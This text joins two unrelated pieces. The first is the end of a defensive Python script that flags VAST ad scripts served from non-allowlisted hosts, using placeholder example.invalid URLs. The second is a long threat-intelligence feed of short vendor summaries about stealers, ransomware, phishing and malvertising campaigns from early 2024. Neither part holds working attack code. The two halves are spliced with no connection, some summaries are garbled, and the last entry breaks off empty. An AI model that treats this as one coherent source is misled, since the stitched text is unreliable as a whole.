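def flag_unapproved(resources, allowed_hosts):
    """Resources served from hosts outside the allowlist (or with no URL at all)."""
    return [r for r in resources
            if urlparse(r["url"]).hostname not in allowed_hosts]


# Constructed VAST 4 response: one plain MP4, one VPAID script, one OMID verifier.
SAMPLE_VAST = """<VAST version="4.0">
  <Ad id="constructed-1">
    <InLine>
      <AdSystem>demo</AdSystem>
      <AdTitle>constructed sample</AdTitle>
      <AdVerifications>
        <Verification vendor="verify.example.invalid">
          <JavaScriptResource apiFramework="omid"><![CDATA[https://verify.example.invalid/omid.js]]></JavaScriptResource>
        </Verification>
      </AdVerifications>
      <Creatives>
        <Creative>
          <Linear>
            <Duration>00:00:15</Duration>
            <MediaFiles>
              <MediaFile delivery="progressive" type="video/mp4" width="640" height="360"><![CDATA[https://cdn.example.invalid/ad.mp4]]></MediaFile>
              <MediaFile delivery="progressive" type="application/javascript" apiFramework="VPAID"><![CDATA[https://ads.example.invalid/vpaid.js]]></MediaFile>
            </MediaFiles>
          </Linear>
        </Creative>
      </Creatives>
    </InLine>
  </Ad>
</VAST>"""

BENIGN_VAST = """<VAST version="4.0"><Ad id="constructed-2"><InLine><AdSystem>demo</AdSystem>
<AdTitle>plain video</AdTitle><Creatives><Creative><Linear><MediaFiles>
<MediaFile delivery="progressive" type="video/mp4"><![CDATA[https://cdn.example.invalid/ad.mp4]]></MediaFile>
</MediaFiles></Linear></Creative></Creatives></InLine></Ad></VAST>"""

if __name__ == "__main__":
    found = script_resources(SAMPLE_VAST)
    for r in flag_unapproved(found, {"verify.example.invalid"}):
        print(f"ad {r['ad']}: unapproved {r['kind']} from {r['url']}")
```

Wrapper ads add a further layer: a VASTAdTagURI redirects the player to another VAST document, so a scanner has to fetch and inspect each hop, not just the first response, before judging a creative clean.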
—
- Intel Source:
- ASEC
- Intel Name:
- CryptoWire_ransomware_distribution
- Date of Scan:
- 2024-03-18
- Impact:
- MEDIUM
- Summary:
- This report provides an analysis of the CryptoWire ransomware, an open-source malware initially spread in 2018 via phishing emails. The malware is written in Autoit and contains the decryption keys within the code, allowing files to be decrypted without payment. It encrypts files and leaves a ransom note demanding payment, but does not require payment due to the presence of the keys.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_stealer_name_Xehook
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- Cyble analysts discovered a new stealer named Xehook in January 2024. Xehook Stealer targets the Windows operating system and is written in .NET. The threat actor claims that it offers dynamic data collection from all Chromium- and Gecko-based browsers, supporting over 110 cryptocurrencies and 2FA extensions.
—
- Intel Source:
- F1tym1
- Intel Name:
- Online_Scam_campaign
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Scammers target mobile phones because they are the most widespread and most used devices, relying on deception and fraud to steal money, information and permissions.
Source:
https://f1tym1.com/2024/03/14/online-scam-scams-encountered-on-my-phone/
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_Fake_Forum_Post_Leading_to_GootLoader_Infection
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto have discovered that another fake forum post links to the GootLoader malware. Since at least 2021, this distribution strategy has shown remarkable consistency.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Threat_actors_leverage_document_for_credential_and_session_token_theft
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft, and session token theft during recent incident response and threat intelligence engagements.
Source:
https://blog.talosintelligence.com/threat-actors-leveraging-document-publishing-sites/
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- Exdefacer_Turns_Seller_of_Discord_Stealer_aka_Nikki_Stealer
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have found that a person formerly known for defacing websites has switched to selling a Discord stealer built on the Electron framework, named Nikki Stealer. The latest changes in Nikki Stealer v9 show how quickly the tool is evolving. Conversation logs from the Nikki Stealer Discord server show users complaining about the stealer’s detection rate, and the developer talking openly about drug use. Notable parallels have been observed between Fewer and Nikki Stealer.
—
- Intel Source:
- SOCRadar
- Intel Name:
- GhostSec_profile
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- GhostSec’s primary target is online terrorism and violent extremism, and the group quickly gained recognition for its approach to confronting extremist groups online. It even claims that some of its members were employed by government agencies during an alleged meeting with the US government. GhostSec’s initial goal was the somewhat vague aim of disrupting the online presence and communication of terrorist organizations such as ISIS (Islamic State of Iraq and Syria) and Al-Qaeda. While the group initially appeared neutral in the Israel-Hamas conflict, it later declared its support for Palestine against what it perceived as Israel’s war crimes.
—
- Intel Source:
- Checkpoint
- Intel Name:
- DocLink_Defender_prevention_technology
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- DocLink Defender leverages the latest in analytical technology to intercept and neutralize malicious documents instantly.
—
- Intel Source:
- Zscaler
- Intel Name:
- Roblox_Users_Targeted_with_Tweaks_Malware
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Zscaler threat researchers observed a new campaign spreading an infostealer called Tweaks that targets Roblox users. Attackers distribute Tweaks through platforms such as YouTube and Discord, which lets them evade web-filter block lists that typically block known malicious servers. They share malicious files disguised as Frames Per Second (FPS) optimization packages, and users who run them infect their own systems with Tweaks.
—
- Intel Source:
- Trendmicro
- Intel Name:
- DarkGate_Operators_Exploit_Microsoft_Windows_SmartScreen_Bypass
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative tracked a DarkGate campaign observed in January 2024 in which DarkGate operators exploited CVE-2024-21412, the Microsoft Windows SmartScreen bypass that ZDI had previously analyzed as a zero-day used by the Water Hydra APT.
—
- Intel Source:
- Esentire
- Intel Name:
- An_increase_in_tax_themed_phishing_emails
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- This month, eSentire has seen a spike in malware delivered through tax-themed phishing emails. Threat Actors are trying to exploit the tax-related communications lures to trick individuals into opening malicious email links, leading to malware infections. The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.
Source:
https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure
—
- Intel Source:
- Cybereason
- Intel Name:
- The_ActiveMQ_Vulnerability_Is_Being_Exploited_by_Messengers
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Cybereason researchers investigated an incident on a Linux server in which malicious shell (bash) commands were executed by a Java process running Apache ActiveMQ. ActiveMQ is an open-source message broker used to pass messages between disparate servers that may run different operating systems or be written in different languages.
Source:
https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
—
- Intel Source:
- Palo Alto
- Intel Name:
- BunnyLoader_3_analysis
- Date of Scan:
- 2024-03-15
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit 42 shared an analysis of the newly released BunnyLoader 3.0, its infrastructure and an overview of its capabilities. BunnyLoader is constantly evolving malware that can steal information, credentials and cryptocurrency and deliver additional malware to its victims; which payloads it delivers is decided by the buyer. The threat actor behind it is known as “Player” or “Player_Bunny,” and the author prohibits its use against Russian systems.
Source:
https://unit42.paloaltonetworks.com/analysis-of-bunnyloader-malware/
—
- Intel Source:
- Securelist
- Intel Name:
- The_Chinese_users_targeted_by_infected_text_editors
- Date of Scan:
- 2024-03-15
- Impact:
- LOW
- Summary:
- Securelist analysts discovered two related cases in which modified versions of popular text editors were distributed through a search engine: in the first case, the malicious resource appeared in the advertising section; in the second, at the top of the search results.
Source:
https://securelist.com/trojanized-text-editor-apps/112167/
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Using_GitHub_and_AWS_to_Spread_RATs_Through_Phishing_Campaigns
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- A recent phishing campaign has been discovered in which attackers abuse publicly accessible platforms such as GitHub and Amazon web servers to host malware, which is then delivered via email to initiate the attack and take over newly compromised systems. According to FortiGuard Labs, the email tricks recipients into opening a dangerous, high-severity Java downloader that attempts to deploy the well-known STRRAT remote access trojan (RAT) and a brand-new RAT called VCURMS. Every platform with Java installed is susceptible, and the attack can affect any kind of business.
Source:
https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Multiple_Ongoing_Malvertising_Activities_Used_to_Distribute_FakeBat
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- Malwarebytes observed FakeBat malvertising campaigns using two kinds of ad URLs. The campaigns misused URL/analytics shorteners, which are well suited to cloaking, as seen in past malvertising efforts. This technique lets a threat actor choose a “good” or “bad” destination URL according to their own predetermined criteria (such as the IP address, user agent, and time of day).
—
- Intel Source:
- Securelist
- Intel Name:
- Malicious_Advertising_Using_Search_Engines
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- Researchers at Securelist have noticed a rise in the number of malicious campaigns that distribute malware via Google Ads. Two distinct stealers, Rhadamanthys and RedLine, were abusing the search engine promotion scheme to infect victims’ computers with malicious payloads. Both appear to use the same method of imitating websites associated with popular programs such as Blender 3D and Notepad++.
Source:
https://securelist.com/malvertising-through-search-engines/108996/
—
- Intel Source:
- G DATA
- Intel Name:
- RisePro_Stealer_Is_Aiming_at_Github_Users
- Date of Scan:
- 2024-03-13
- Impact:
- MEDIUM
- Summary:
- Researchers from G DATA Cyber Defense have found at least 13 GitHub repositories that are part of a RisePro stealer campaign the threat actors have dubbed “gitgub.” The repositories look alike and offer free cracked software in a README.md file. On GitHub, green and red circles are commonly used to indicate the status of automated builds. The gitgub threat actors inserted four green Unicode circles into their README.md file that appear to show a build status alongside the current date, giving the impression of validity and recency.
Source:
https://www.gdatasoftware.com/blog/2024/03/37885-risepro-stealer-campaign-github
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Decoding_Malicious_Scripts_Using_ChatGPT
- Date of Scan:
- 2024-03-13
- Impact:
- LOW
- Summary:
- Researchers from ISC.SANS have discovered a malicious Python script with a low VirusTotal score of 2/61. When they examined it, the script was obfuscated: all of the interesting strings were compressed, Base64-encoded, and hex-encoded.
—
- Intel Source:
- SOC Radar
- Intel Name:
- A_Dark_Web_Profile_of_Meow_Ransomware
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Four ransomware strains descended from the leaked Conti ransomware were found in late 2022; Meow ransomware was one of them. This crypto-ransomware was observed operating between the end of August and early September 2022 and continued until February 2023. The operators stopped in March 2023 after a free decryptor for Meow ransomware was released. An organization called Meow is still active, however: it entered 2024 quickly and has already claimed nine victims. The gang appears to use the RaaS model; in March 2024 alone, three victims were reported, and the institutions it targets are not insignificant ones.
Source:
https://socradar.io/dark-web-profile-meow-ransomware/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Attacks_on_Crypto_Wallet_Recovery_Passwords_by_Malicious_PyPI_Packages
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs have discovered a new malicious campaign consisting of seven distinct open-source packages on the Python Package Index (PyPI) with 19 versions in total, the oldest of which was released in December 2022. The campaign aims to steal the mnemonic phrases used to recover lost or destroyed crypto wallets.
—
- Intel Source:
- Symantec
- Intel Name:
- Operators_Adapt_to_Disruption_as_Ransomware_Attacks_Rise
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Even though the number of attacks that ransomware operators claim to have carried out dropped by little more than 20% in the fourth quarter of 2023, ransomware activity is still on the rise. Attackers have continuously improved their strategies, shown that they can react quickly to disruptions, and discovered new means of infecting victims.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-attacks-exploits
—
- Intel Source:
- Splunk
- Intel Name:
- SnakeKeylogger_loader_technics_and_tactics
- Date of Scan:
- 2024-03-12
- Impact:
- MEDIUM
- Summary:
- In their blog, the Splunk Threat Research Team shared detailed insights into the loader tactics and techniques of SnakeKeylogger so that security analysts and blue teamers can recognize and defend against this suspicious activity.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer_Posing_as_Installer_For_Adobe_Reader
- Date of Scan:
- 2024-03-12
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found an infostealer being distributed that poses as the Adobe Reader installer. The threat actor distributes it via a PDF file that prompts the reader to download and execute it.
—
- Intel Source:
- ASEC
- Intel Name:
- Spread_of_Malware_MSIX_Pretended_to_Be_Notion_Installer
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- A fake Notion installer is being used as a ruse to deliver MSIX malware. The distribution website resembles the official Notion homepage. When the user clicks the download button, a file called “Notion-x86.msix” is downloaded. This file, a Windows app installer, is signed with a legitimate certificate. When the user runs the file, an installer pop-up appears, and clicking the Install button installs the malware on the user’s computer along with Notion.
—
- Intel Source:
- GuidePoint Security
- Intel Name:
- The_TeamCity_Exploit_Leads_BianLian_to_Embrace_PowerShell
- Date of Scan:
- 2024-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at GuidePoint have discovered malicious activities on a client’s network. After locating a weak point in the TeamCity server, the threat actor used CVE-2024-27198 / CVE-2023-42793 to gain initial access to the system. Within TeamCity, the threat actor created users and executed malicious commands using the service account associated with the TeamCity product.
Source:
https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/
—
- Intel Source:
- Darktrace
- Intel Name:
- A_New_Phishing_Attack_Targeting_Dropbox
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- Darktrace researchers have alerted users to a new phishing and malspam campaign that uses Dropbox emails to target users of well-known Software-as-a-Service (SaaS) platforms. According to recent research, this phishing attempt targeting Dropbox has been effective in bypassing MFA (multi-factor authentication) safeguards. By tricking users into downloading malware, the attack seeks to expose login credentials.
—
- Intel Source:
- Sucuri
- Intel Name:
- Malicious_Campagin_Exploiting_Stored_XSS_in_Popup_Builder
- Date of Scan:
- 2024-03-11
- Impact:
- LOW
- Summary:
- Attackers use a known vulnerability in the Popup Builder WordPress plugin to inject malicious code into the plugin’s Custom JS or CSS section of the WordPress admin interface, which is stored internally in the wp_postmeta database table.
—
- Intel Source:
- Inquest
- Intel Name:
- An_emerging_information_stealing_Project_trojan
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- The article discusses the emergence of a new trojan called Planet Stealer, which is designed to steal sensitive information from victim hosts. It is written in Go and is being sold in underground forums. This type of information-stealing malware is in high demand among financially motivated criminals, indicating a thriving market for such tools.
Source:
https://inquest.net/blog/around-we-go-planet-stealer-emerges/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Magnet_Goblin_Uses_1_Day_Vulnerabilities_to_Target_Publicly_Facing_Servers
- Date of Scan:
- 2024-03-08
- Impact:
- MEDIUM
- Summary:
- Magnet Goblin, a financially motivated threat actor, rapidly adopts and exploits one-day vulnerabilities in public-facing services as a means of spreading infection. In one instance involving Ivanti Connect Secure VPN (CVE-2024-21887), the exploit was added to the group’s toolkit less than a day after a proof of concept was published.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- New_Fakext_Malware_Targeting_Latin_American_Banks
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- IBM security researchers have discovered a new, widely distributed malware called Fakext which leverages a malicious Edge plugin to launch web-injection and man-in-the-browser attacks. Over 35,000 infected sessions have been seen by researchers since November 2023; the majority of these sessions originate from Latin America (LATAM), with a lesser proportion from North America and Europe.
Source:
https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/
—
- Intel Source:
- ESET
- Intel Name:
- Compromised_Supply_Chain_and_Sophisticated_Toolkit_Exposed
- Date of Scan:
- 2024-03-08
- Impact:
- LOW
- Summary:
- ESET researchers identified a cyberespionage campaign directed at Tibetans across various regions. The threat actors deployed downloaders, droppers, and backdoors, such as the exclusive MgBot and the recently added Nightdoor, targeting networks in East Asia. Additionally, the attackers compromised the supply chain of a Tibetan language translation app developer.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Navigating_the_tax_season_global_surge
- Date of Scan:
- 2024-03-08
- Impact:
- MEDIUM
- Summary:
- As tax deadlines approach globally, individuals and businesses must be vigilant against an increase in tax-related scams and ransomware attacks. Scammers exploit this period to launch sophisticated phishing campaigns, aiming to steal personal information, financial data, or directly extract money through deceit. Notably, the collaboration between ransomware groups GhostSec and Stormous has marked a significant rise in ransomware threats, including the deployment of the STMX_GhostLocker ransomware-as-a-service.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-march-7-2024/
—
- Intel Source:
- Zscaler
- Intel Name:
- Beware_of_Malware_Delivering_Spoofing_Websites
- Date of Scan:
- 2024-03-07
- Impact:
- LOW
- Summary:
- Researchers at Zscaler have identified a threat actor who creates fake websites for Zoom, Google Meet, and Skype in order to distribute malware. The threat actor infects Windows users with NjRAT and DCRat and distributes SpyNote RAT to Android users. By using shared web hosting, the attacker was able to host all of these fake online meeting sites under a single IP address. As shown in the figures in the report, the fake websites were all in Russian. Furthermore, the attackers hosted these fake sites on URLs that closely resembled the real ones.
—
- Intel Source:
- Harfanglab
- Intel Name:
- A_Thorough_Examination_of_I_SOONs_Commercial_Offering
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- I-Soon’s business proposal indicates that processing the gathered data, rather than initially reaching targets, is their primary problem. Their products classify and sort stolen documents with the aid of deep learning. The company appears to have difficulty obtaining malware and usually relies on rudimentary techniques (phishing, for example), yet over the last ten years it has breached numerous strategic targets around the world.
Source:
https://harfanglab.io/en/insidethelab/isoon-leak-analysis/
—
- Intel Source:
- Cado Security
- Intel Name:
- The_Spinning_Yarn_Linux_Malware_Campaign_Targeting_Misconfigured_Servers
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Cado Security Labs have discovered a new malware campaign that targets misconfigured servers that host web-facing services including Redis, Docker, Apache Hadoop YARN, and Confluence. The campaign makes use of several distinct and unreported payloads, such as four Golang binaries, which are instruments for automatically locating and infecting sites that are hosting the aforementioned services. By utilizing common misconfigurations and an n-day vulnerability, the attackers use these tools to generate exploit code that allows them to conduct Remote Code Execution (RCE) attacks and infect new hosts.
—
- Intel Source:
- Intel-Ops
- Intel Name:
- Examining_Infrastructure_That_8Base_Using_in_Relation_to_Phobos_Ransomware
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Intel-Ops is actively monitoring infrastructure determined to be part of the 8Base ransomware operation, which runs the Phobos ransomware. A dispersed group of affiliates with very similar TTPs, along with several variants (Eking, Eight, Elbie, Devos, and Faust), suggests that Phobos operates as a Ransomware-as-a-Service (RaaS).
—
- Intel Source:
- Qurium
- Intel Name:
- The_fake_video_connected_to_Russian_cyberscam_network
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- A deep fake video of Maria Ressa promoting a crypto-currency scam was released in early February 2024. The video was hosted on a domain that contained links to a Russian cyberscam network. Metadata analysis revealed Russian influence behind the creation of the deep fake and fake news articles designed to discredit Ressa.
—
- Intel Source:
- Sucuri
- Intel Name:
- Distributed_WordPress_Brute_Force_Attack
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent attack on WordPress websites, where infected websites are used to launch a distributed brute force attack to guess passwords for other third-party sites. The attackers then visit the target sites to download valid credentials. The article provides statistics and tips for mitigating the risk of such attacks, as well as a new development in website hacks involving Web3 crypto wallet drainers. It also explains the process of uploading encrypted credentials and the different stages of the attack. The article concludes by offering assistance for those who believe their website may be infected.
Source:
https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html
—
- Intel Source:
- Cyfirma Research
- Intel Name:
- New_Lighter_Ransomware_Targeting_Individuals_in_UK_and_US
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyfirma have identified a brand-new malware developed by the Lighter Extortion group, which they have named Lighter malware. This is an uncommon instance of triple extortion: in addition to encrypting and exfiltrating the data, the threat actors make threats against the victim if the ransom is not paid. Based on the ransom note, the threat actors are likely to target individuals in the US and the UK.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Diving_Deep_into_Earth_Kapre_Group
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have investigated Earth Kapre, also known as RedCurl and Red Wolf. Their investigation revealed the intrusion set Earth Kapre used in a recent incident and shows how the team used threat intelligence to link the extracted evidence to the cyberespionage group.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA4903_Using_Phishing_Attack_on_US_Government_and_Small_Businesses
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have noticed a rise in credential phishing and fraud campaigns attributed to TA4903 in mid-2023 and early 2024 that use new themes. The actor began spoofing small and medium-sized businesses (SMBs) across a range of sectors, including manufacturing, energy, finance, food and beverage, and construction. According to Proofpoint, the pace of BEC themes has also increased, with lures such as “cyberattacks” used to entice victims into divulging their banking and payment information.
—
- Intel Source:
- ASEC
- Intel Name:
- WebLogic_Server_Exploited_by_z0Miner
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered multiple instances of threat actors targeting vulnerable Korean servers. The report describes a recent incident in which the threat actor “z0Miner” attacked Korean WebLogic servers.
—
- Intel Source:
- Sekoia
- Intel Name:
- The_DDoSia_Project_of_NoName057_16
- Date of Scan:
- 2024-03-06
- Impact:
- LOW
- Summary:
- Since the start of the conflict in Ukraine, a number of organizations dubbed “nationalist hacktivists” have surfaced, mostly on the Russian side, to fuel hostilities between Moscow and Kyiv. Of these organizations, the pro-Russian group NoName057(16) has gained notoriety for starting Project DDoSia, a group effort to launch massive distributed denial-of-service (DDoS) attacks against organizations (private companies, government agencies, and state institutions) that are part of nations that back Ukraine, primarily NATO members.
Source:
https://blog.sekoia.io/noname05716-ddosia-project-2024-updates-and-behavioural-shifts
—
- Intel Source:
- Sophos, GitHub
- Intel Name:
- Attackers_still_abusing_Terminator_tool_and_variants
- Date of Scan:
- 2024-03-06
- Impact:
- MEDIUM
- Summary:
- A threat intelligence report describes that threat actors continue to leverage vulnerable drivers like Zemana Anti-Logger and Anti-Malware to disable security products through Bring Your Own Vulnerable Driver attacks. Variants of the Terminator tool that exploits these drivers are still observed in the wild. The actors use the drivers for lateral movement and privilege escalation as part of ransomware campaigns targeting healthcare and other industries.
Source:
https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants/
https://github.com/sophoslabs/IoCs/blob/master/Zemana-driver-IoCs.csv
—
- Intel Source:
- Double Agent
- Intel Name:
- A_novel_backdoor_GTPDOOR
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- GTPDOOR is Linux malware that communicates C2 traffic over GTP-C signaling messages, blending in with normal telco traffic. It can execute commands sent in GTP echo requests and probe hosts covertly via TCP packets. Versions target x86 and i386 architectures.
Source:
https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_surge_of_new_GhostLocker_2_ransomware_by_GhostSec_threat_group
- Date of Scan:
- 2024-03-05
- Impact:
- MEDIUM
- Summary:
- The article discusses the evolution and joint operation of GhostSec and Stormous, two hacking groups that have collaborated to conduct double extortion attacks using the GhostLocker and StormousX ransomware programs. It provides details on the various versions of GhostLocker, its C2 panels, and the features provided to affiliates. The article also mentions two new tools in GhostSec’s arsenal, the GhostSec Deep Scan toolset and GhostPresser, which are used for scanning and attacking legitimate websites. It discusses the groups’ focus on raising funds for hacktivists and threat actors and their new ransomware-as-a-service program. The article also provides information on the capabilities of GhostPresser, a tool used to target WordPress websites, and how Cisco Secure Endpoint and other Cisco products can prevent the execution of this malware. It also includes a list of indicators associated with this threat.
Source:
https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/
—
- Intel Source:
- Cyfirma Research
- Intel Name:
- An_Extremely_Harmful_Malware_WinDestroyer
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have discovered WinDestroyer, a destructive malware. It does not demand a ransom, indicating that it is not financially motivated. This advanced threat uses sophisticated tactics to render systems unusable, including lateral movement capabilities, API hammering, and DLL reload attacks.
—
- Intel Source:
- NS Focus Global
- Intel Name:
- The_security_threats_from_malicious_machine_learning_models
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- The article discusses the potential security threats posed by malicious machine learning (ML) models on the Hugging Face platform. It provides background information on a recent report that found some ML models on Hugging Face may be used to attack the user environment, leading to code execution and providing attackers with full control of the infected machine. The affected models, specifically the baller423/goober2 model, are discussed in detail, along with a technical analysis of how they work and how they can be loaded and executed. The article also highlights the potential risks associated with PyTorch and Tensorflow models. It concludes with mitigation methods, such as using Hugging Face’s new format Safetensors and implementing security measures like malware and Pickle scanning. The article emphasizes the importance of thorough scrutiny and safety measures when dealing with ML models from untrusted sources and the urgency of AI model security.
Source:
https://nsfocusglobal.com/ai-supply-chain-security-hugging-face-malicious-ml-models/
—
- Intel Source:
- Cert.360
- Intel Name:
- New_variant_of_SupermanMiner_mining_malware
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- A new variant of the SupermanMiner cryptocurrency mining malware has been active for over 2 years, using techniques like vulnerability exploitation, SSH brute force, web shell injection and others to infect systems. It has evolved into multiple new branches, with heavy obfuscation and complex persistence mechanisms, posing a serious threat. Users should apply security patches, use strong passwords, and limit external access to prevent infection.
Source:
https://cert.360.cn/warning/detail?id=65deee7fc09f255b91b17e0f
—
- Intel Source:
- Fortinet
- Intel Name:
- CHAVECLOAKS_Targeting_Brazilians_via_Malicious_PDFs
- Date of Scan:
- 2024-03-05
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have found CHAVECLOAK, a high-severity Trojan that targets Brazilian bank customers. The malware targets Windows devices and gains access to online banking services, stealing financial data and banking credentials.
Source:
https://www.fortinet.com/blog/threat-research/banking-trojan-chavecloak-targets-brazil
—
- Intel Source:
- ASEC
- Intel Name:
- WogRAT_Malware_Exploiting_aNotepad
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found backdoor malware being distributed via the free online notepad tool aNotepad. The malware comes in both PE format, targeting Windows systems, and ELF format, targeting Linux systems. It is classified as WogRAT because the threat actor uses the string “WingOfGod” when building it.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Remcos_RAT_and_Agent_Tesla_Deployed_by_Stego_Campaign
- Date of Scan:
- 2024-03-05
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma have discovered a campaign that uses template injection in a Microsoft Office document to bypass standard email security safeguards. Opening the document initiates a multi-stage attack that downloads and executes scripts and deploys the malware known as “Agent Tesla” and the Remcos Remote Access Trojan (RAT).
—
- Intel Source:
- Cleafy
- Intel Name:
- A_recent_Copybara_fraud_campaign
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- The article discusses the rising threat of On-Device Fraud (ODF) in the banking sector, which involves fraudulent activities initiated directly on the victim’s device. It focuses on a recent Copybara fraud campaign and explains the use of remote control capabilities by malware to execute ODF scenarios. The article also provides an overview of phishing panels and the Copybara botnet’s associated C2 web panel. It describes the functionalities of the panel, including the ability to remotely control infected devices, steal credentials, and send fake push notifications. The article concludes by emphasizing the need for collaboration and innovation in combating ODF and other forms of banking fraud.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_use_of_spyware_Predator_poses_significant_risks
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- Recorded Future’s Insikt Group has observed new activity related to the operators of Predator, a mercenary mobile spyware. Spyware like Predator poses significant privacy, legality, and physical safety risks, especially when used outside serious crime and counterterrorism contexts. The Insikt Group’s research found out about a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA577_Cyber_Threat_Unmasked
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- Proofpoint researchers have uncovered a new attack chain by threat actor TA577 focused on the uncommon theft of NT LAN Manager (NTLM) authentication information. Two campaigns were detected on 26 and 27 February 2024, targeting hundreds of organizations worldwide through thread hijacking with zipped HTML attachments.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Wave_of_SocGholish_Infections
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
- The article discusses a new wave of SocGholish malware infections targeting WordPress websites. Malicious plugins are being uploaded to compromised websites and contain code that injects SocGholish payloads into the site. The article gives examples of different plugins that have been modified to include this code and explains how the code is executed. It also names the TDS domains used to host the SocGholish scripts and notes their recent registration dates. The article emphasizes the responsibility of website owners to keep their websites secure and provides tips for preventing malware distribution. It also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article also discusses the similarities between the criminal organizations behind these attacks and regular IT companies, and highlights the importance of website visitors staying vigilant and avoiding suspicious links. It concludes by stressing the importance of protecting websites from these attacks and describes the techniques used by attackers, such as “domain shadowing” and gaining access through compromised credentials.
—
- Intel Source:
- Lookout
- Intel Name:
- Advanced_Phishing_Kit_Targeting_Cryptocurrency_Platforms_and_FCC
- Date of Scan:
- 2024-03-04
- Impact:
- LOW
- Summary:
